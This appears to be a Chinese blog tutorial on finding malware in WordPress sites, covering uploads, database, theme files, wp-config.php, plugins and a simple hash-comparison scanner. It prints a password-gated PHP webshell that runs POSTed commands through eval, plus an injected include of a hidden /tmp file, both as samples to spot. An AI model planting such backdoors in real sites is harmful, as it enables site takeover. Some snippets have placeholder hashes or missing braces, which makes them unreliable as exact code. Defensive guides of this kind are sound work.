WordPress恶意软件检测

1. 先别慌，当你发现WordPress网站打开突然变慢或者跳转到奇怪页面，可能就是中招了。恶意软件不像感冒会打喷嚏，它喜欢偷偷摸摸改文件。第一步用FTP连上服务器，直奔wp-content/uploads/文件夹，按时间排序，最近修改的.php文件要重点检查——正常这里只存图片，突然冒出PHP文件准没好事。

2. 比如发现个叫"image.jpg.php"的文件，打开看到这种代码：

   <?php
   $auth_pass = "hacked";
   if(isset($_POST['pass']) && md5($_POST['pass']) == 'd3db4b5f6a7b8c9') {
   @eval($_POST['cmd']);
   ?>

   这是经典的后门脚本，用md5密码保护Webshell，黑客用POST传参就能执行任意命令。立马删除没商量。

3. 数据库也不安全，恶意代码常藏在wp_posts表里。跑个SQL查询找可疑的JavaScript：

   SELECT * FROM wp_posts WHERE post_content LIKE '%<script>eval(%' OR post_content LIKE '%atob(%';

   要是发现post_content里有解码base64的atob()函数，八成是被注入了——有些黑客会把恶意代码编码成乱码逃避检测。

4. 主题文件更是重灾区。检查header.php和footer.php时，注意这种思维跳跃的代码：

   <?php
   // 正常代码
   wp_head();
   // 突然插入奇怪函数
   if(isset($_GET['debug'])) {
   $x = create_function('', 'echo "安全检测通过";');
   $x();
   }
   ?>

   create_function()早就被PHP废弃，但黑客爱用它创建匿名函数执行代码，看到就直接注释掉。

5. 别忘了wp-config.php这个核心配置。黑客喜欢在<?php后面加一行：

   @include_once('/tmp/.htaccess');

   这招叫本地文件包含，试图加载隐藏的恶意配置。修复时记得对比原始版本的wp-config.php，别光删代码把数据库连接信息弄丢了。

6. 插件漏洞也是入口。比如看到/wp-content/plugins/里有个叫"fake-seo"的陌生插件，赶紧查官方插件目录——野鸡插件经常夹带后门。维护时要像打扫厨房，定期清理停用插件。

7. 最后教个快速检测技巧：在网站根目录创建malware-scanner.php：

   <?php
   // 简易文件哈希对比器
   $clean_hashes = [
   'wp-includes/functions.php' => 'a1b2c3d4e5f6',
   'wp-admin/admin.php' => 'z9y8x7w6v5u4'
   ];
   foreach($clean_hashes as $file => $hash) {
   if(file_exists($file) && md5_file($file) !== $hash) {
       echo "警告：{$file}已被修改！\n";
   }
   }
   ?>

   运行时它会对比核心文件哈希值，不匹配就报警。记得提前从干净安装的WordPress提取标准哈希值。

8. 其实最管用的还是保持更新，就像每天刷牙防蛀牙。WordPress核心+插件+主题全部更新到最新，80%的漏洞都能避免。万一真中招了，别急着重装，先按上面步骤排查——有时候黑客留下的后门比蟑螂窝还隐蔽，得用侦探思维跳着检查：为什么这个图片文件藏在wp-includes里？那个数据库查询为什么半夜三点执行？多问几个为什么，恶意软件就藏不住了。

Tags：

文章版权声明：除非注明，否则均为WP集市原创文章，转载或复制请以超链接形式并注明出处。